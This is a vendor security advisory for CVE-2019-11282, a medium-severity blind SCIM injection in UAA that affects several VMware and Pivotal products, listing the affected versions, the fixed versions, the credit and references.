CVE-2019-11282: UAA is vulnerable to a Blind SCIM injection leading to information disclosure
23853
06 April 2020
06 April 2020
CLOSED
MEDIUM
CVE-2019-11282
Severity
Medium
Vendor
Pivotal
Description
VMware Tanzu Application Service for VMs, versions prior to 2.8.0, Operations Manager, versions prior to 2.8.0, and Pivotal Container Service, versions prior to 1.7.0, contain a vulnerable version of UAA, which contains an endpoint that is vulnerable to SCIM injection. A remote authenticated malicious user with scim.invite scope can craft a request with malicious content which can leak information about users of the UAA.
Affected VMware Products and Versions
Severity is medium unless otherwise noted.
- Operations Manager
- All versions prior to 2.8.0
- Pivotal Container Service (PKS)
- All versions prior to 1.7.0
- VMware Tanzu Application Service for VMs
- All versions prior to 2.8.0
Mitigation
- Operations Manager
- 2.8.0
- Pivotal Container Service (PKS)
- 1.7.0
- VMware Tanzu Application Service for VMs
- 2.8.0
Credit
Amit Laish - GE Digital Cyber Security Team
References
- https://www.cloudfoundry.org/blog/cve-2019-11282/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11282
History
2020-04-06: Initial vulnerability report published.